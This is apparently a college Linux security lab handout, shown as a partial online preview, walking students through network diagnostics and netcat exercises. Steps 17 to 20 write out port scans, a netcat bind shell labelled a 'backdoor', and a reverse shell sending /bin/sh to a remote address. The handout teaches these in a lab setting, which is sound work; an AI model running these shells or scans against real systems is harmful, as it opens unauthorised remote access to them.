Oakton Community College



CIS 290 – LINUX Security

Lab Exercise #4: Simple network review and hacking

1. Install under LINUX – netcat, nmap, Wireshark, firewall and configuration tools.

2. Display all interfaces: ifconfig –a, ifconfig down eth0, ifconfig up eth0

3. Display interface physical attributes: ethtool eth0

4. ping gateway

5. traceroute csc.oakton.edu

6. netstat –rn

7. arp –a

8. telnet csc.oakton.edu

9. netstat –an

10. Review /etc/sysconfig/network-scripts

11. route print, netstat -rn

Stupid network tricks using TELNET, netcat, nmap:

12. Simple client/server

nc -l 1111

nc 127.0.0.1 1111

This is a test

This is a test.

Ending communication with ^C (Ctrl-C)

(Ctrl-C)

13. Simple file transfer

nc -l 1234 > test.out

echo Hi There!!!!! | nc 127.0.0.1 1234

14. Client to web server

echo -e "GET HTTP/1.0\n\n\n\n" | nc -w 5 oakton.edu 80

15. Or getting a server header:

echo -e "HEAD / HTTP/1.0\n\n" | nc 10.0.2.100 80

16. Web Host

web.txt

Welcome to Bob's Webpage

Welcome to Bob's Webpage!!!!!!!!

 

cat web.txt | nc –l –v 80

Point browser to your system – .

CIS 290 – LINUX Security

Lab Exercise #4: Simple network review and hacking

17. Port scanning:

nmap –sT –p 1-65535

nc -z 127.0.0.1 1-1024

echo "quit" | nc -z 127.0.0.1 1-1024

echo EXIT | nc –z -w 1 127.0.0.1 1-1024

18. TELNET client/server

nc -t -l 2323 | /bin/bash

nc 127.0.0.1 2323

echo "Hi there"

logout

19. “Backdoor” shell (-e option not in LINUX, note step 18 as bypass)

nc –e /bin/bash -l 2023

nc –v 127.0.0.1 2023

or

telnet 127.0.0.1 2023

-e option not in LINUX

nc -l 2023 | /bin/bash provide access to bash builtin commands (no external executables.)

20. “Reverse” shell (-e option not in LINUX)

Local machine: nc -n -v -l -p 1234

Remote machine: nc -e /bin/sh 10.0.2.100 1234

21. Telnet to discovered ports:

telnet

................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download